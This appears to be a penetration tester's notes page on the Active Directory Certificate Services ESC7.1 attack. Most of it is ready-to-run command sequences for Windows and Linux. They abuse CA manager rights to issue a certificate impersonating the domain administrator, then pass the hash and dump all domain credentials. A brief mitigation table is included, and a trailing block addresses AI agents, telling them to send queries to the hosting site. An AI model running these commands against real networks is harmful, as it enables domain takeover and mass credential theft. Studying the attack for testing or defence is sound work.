# ESC7 ### **What is ESC7?** Like other securable objects in Active Directory, the Certificate Authority itself can have **overly permissive ACLs**. ESC7 occurs when a low-privileged user is granted one or both of these dangerous rights directly on the CA: | Right | What It Allows | | ------------------------------------------------------ | ---------------------------------------------------------------------- | | **ManageCA** (CA Administrator) | Change CA configuration, enable SAN on all templates, add new officers | | **ManageCertificates** (Certificate Manager / Officer) | Approve and issue certificate requests that are pending or were denied | > If you only have **ManageCA** but not ManageCertificates, you can grant yourself ManageCertificates by adding your account as a new **Officer** a user with certificate manager rights. *** #### **CBA Patch Consideration** Since Microsoft's **Certificate-Based Authentication (CBA)** patches introduced strong certificate mapping checks, the classic ESC6 path via `EDITF_ATTRIBUTESUBJECTALTNAME2` (enabling SAN on all templates using ManageCA) is **no longer effective** in fully patched environments. Two alternate attack paths remain viable even with the CBA patch in Full Enforcement mode: | Path | Method | Reference | | ---------- | --------------------------------------------------------------------------------------- | -------------------------------------------------------------------------- | | **ESC7.1** | Abuse the `SubCA` template submit a denied request, approve it using ManageCertificates | [Tarlogic ESC7](https://www.tarlogic.com/blog/ad-cs-esc7-attack/) | | **ESC7.2** | Abuse CRL Distribution Points (CDPs) to deploy SYSTEM web shells to the CA server | [Tarlogic ManageCA RCE](https://www.tarlogic.com/blog/ad-cs-manageca-rce/) | These notes cover **ESC7.1**. *** ### **How ESC7.1 Works** The `SubCA` template is essentially ESC1-vulnerable, but **only administrators can enroll in it by default**. The trick is: 1. Submit a certificate request using the `SubCA` template with a spoofed SAN it will be **denied** because you lack enroll rights 2. The private key is saved locally despite the denial 3. Use **ManageCertificates** rights to **approve and issue** the denied request 4. Retrieve the issued certificate and combine it with your saved private key 5. Use the certificate to authenticate as the target account *** ### **Prerequisites** * User has **ManageCA** rights on the CA (can grant themselves ManageCertificates if missing) * **ManageCertificates** rights (or ability to add self as officer) * `SubCA` template is enabled (can be enabled via ManageCA if disabled) *** ### **Exploitation Windows (ESC7.1)** **Step 1 Enumerate** ```bash certify.exe find ``` Look for `Allow, ManageCA, ManageCertificates` on your user or group. *** **Step 2 Submit the Failing Request** ```bash certify.exe request /ca: /template:SubCA /altname:administrator /domain:domain.corp /sidextension: ``` Expected output: `The submission failed: Denied by the policy module` Despite the denial, **save the private key** output as `esc7.pem`. Note the **Request ID** from the output (e.g. `58`). *** **Step 3 Approve the Denied Request** ```bash certify-esc7.exe issue /ca: /id:58 ``` Expected output: `Certificate issued!` *** **Step 4 Download the Approved Certificate** ```bash certify-esc7.exe download /ca: /id:58 ``` Append the downloaded certificate to your saved private key file: ```bash type downloaded.pem >> esc7.pem ``` *** **Step 5 Convert to PFX** ```bash openssl pkcs12 -in esc7.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc7.pfx ``` Enter a password when prompted (e.g. `Passw0rd!`). *** **Step 6 Request TGT and Access DC** ```bash Rubeus.exe asktgt /user:administrator /certificate:esc7.pfx /password:Passw0rd! /domain:domain.corp /nowrap /ptt ``` ```bash klist winrs -r:dc01.domain.corp cmd ``` *** ### **Exploitation Linux (ESC7.1)** **Step 1 Enumerate** ```bash certipy find -u internaluser@domain.corp -hashes -stdout ``` Look for `ManageCA` and `ManageCertificates` permissions on the CA object. *** **Step 2 Add Yourself as Officer (if missing ManageCertificates)** ```bash certipy ca -u internaluser@domain.corp -hashes -ca -dc-ip -target ca.domain.corp -add-officer internaluser ``` *** **Step 3 Enable SubCA Template (if disabled)** ```bash certipy ca -u internaluser@domain.corp -hashes -ca -dc-ip -target ca.domain.corp -enable-template SubCA ``` *** **Step 4 Submit the Failing Request** ```bash certipy req -u internaluser@domain.corp -hashes -target ca.domain.corp -ca -template SubCA -upn administrator@domain.corp -extension-sid -out esc7_certipy -dc-ip ``` This will fail with a denial that is expected. The **private key is saved** and the **Request ID** is shown in the output. *** **Step 5 Approve the Denied Request** ```bash certipy ca -u internaluser@domain.corp -hashes -ca -dc-ip -target ca.domain.corp -issue-request ``` *** **Step 6 Retrieve the Issued Certificate** ```bash certipy req -u internaluser@domain.corp -hashes -ca -dc-ip -target ca.domain.corp -retrieve -out esc7_certipy ``` *** **Step 7 Authenticate and Retrieve NTLM Hash** ```bash certipy auth -pfx esc7_certipy.pfx -domain domain.corp ``` This performs **UnPAC-the-Hash**, returning the NT hash of the administrator account. *** **Step 8 Pass-the-Hash** ```bash netexec smb dc01.domain.corp -u administrator -H ``` Or dump all credentials: ```bash secretsdump.py -hashes : 'domain.corp/administrator@dc01.domain.corp' ``` *** ### **Key Differences ESC7.1 vs Other ESCs** | | ESC1 | ESC7.1 | | -------------------- | --------------------------------------- | ------------------------------------------- | | **Requires** | Enroll rights on misconfigured template | ManageCA / ManageCertificates on the CA | | **Template target** | Any vulnerable template | SubCA specifically | | **Request outcome** | Approved immediately | Intentionally denied then manually approved | | **CBA patch bypass** | Requires `-extension-sid` | Yes — SID extension in SubCA request | *** ### **Mitigation** | Fix | How | | ----------------------- | ----------------------------------------------------------------- | | Audit CA ACLs | Remove ManageCA / ManageCertificates from non-admin accounts | | Restrict SubCA template | Disable if not required | | Enable CA audit logging | Log all certificate issuance and approval events | | Regular ACL reviews | Use BloodHound / Certipy to identify over-permissioned CA objects | *** #### **Resources** * [Tarlogic — AD CS ESC7 Attack](https://www.tarlogic.com/blog/ad-cs-esc7-attack/) * [Tarlogic — ManageCA RCE (ESC7.2)](https://www.tarlogic.com/blog/ad-cs-manageca-rce/) * [Red & Blue Team Security — ESC7 Walkthrough](https://www.rbtsec.com/blog/active-directory-certificate-attack-esc7/) * Altered Security AD CS Course --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc7.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.